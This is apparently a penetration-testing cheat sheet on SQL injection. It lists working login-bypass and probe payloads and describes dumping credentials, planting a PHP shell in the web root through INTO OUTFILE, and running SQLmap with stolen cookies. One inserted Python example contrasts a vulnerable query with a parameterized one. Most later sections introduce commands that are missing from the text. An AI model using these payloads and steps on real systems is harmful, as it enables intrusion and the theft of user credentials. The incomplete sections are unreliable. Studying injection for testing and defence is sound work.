SQL injection

Basic technique

Stick ' in a parameter and see if it throws a database error (and note what kind).

Another simple test:

' or '1'='1

Other tests:

-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x

POST parameters

You can also attempt to inject parameters passed using POST requests, but you'll need Burp or Firefox tamper to view and edit them. For example, you can test a parameter by adding a ' at the end, like lang=en'.

Bypassing authentication

If you find a poorly-sanitized login page, you can attempt to log in without credentials by injecting the username parameter:
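As an added illustration (not code from the original page), the same login check written the vulnerable way and the parameterized way, run against a constructed in-memory SQLite table; the page's ' probe and ' or true-- payload behave differently against the two:

```python
import sqlite3

# Constructed sample data for the demo (not from the page): a single user row.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct horse')")
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    """Query built by string concatenation: the input is spliced in as SQL text."""
    query = ("SELECT COUNT(*) FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    return conn.execute(query).fetchone()[0] > 0

def login_parameterized(conn, username, password):
    """Same check with bound parameters: the input is only ever compared as data."""
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()[0] > 0

def probe_error(conn, login_fn, probe="'"):
    """Returns the database error text a lone ' provokes, or None when it is handled."""
    try:
        login_fn(conn, probe, "x")
        return None
    except sqlite3.Error as exc:
        return str(exc)

if __name__ == "__main__":
    db = make_db()
    # The username payload comments out the password check in the concatenated query
    # but is just an unknown username when bound as a parameter.
    print(login_vulnerable(db, "' or true--", "wrong"))      # True
    print(login_parameterized(db, "' or true--", "wrong"))   # False
    print(probe_error(db, login_vulnerable))                 # syntax error text
    print(probe_error(db, login_parameterized))              # None
```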

Database enumeration

The exact syntax for injection will vary by database type. In most lab scenarios, the database will be MySQL.

Get version:

You can get the number of columns through trial and error using order by. For each query, increase the column number until the database throws an unknown column error:

Get the current user:

See all tables:

Get column names for a specified table:

Get usernames and passwords (0x3a is the hex encoding of the : separator):

Depending on the database user's file permissions, you might be able to write to system files using MySQL's INTO OUTFILE clause to create a PHP shell in the web root:

I suspect you could inject a full reverse shell in there too...

SQLmap

Assuming you've tested a parameter with ' and it is injectable, run SQLmap against the URL:

It may not run unless you specify the database type.

Get the databases:

Get the tables in a database:

Get the columns in a table:

Dump a table:

Passing tokens

If the URL isn't accessible, you can pass cookie data or authentication credentials to SQLmap by pasting the POST request into a file and using the -r option:

If you just need to pass a cookie:

REST-style URLs

If your URLs have no parameters, you can still test them:
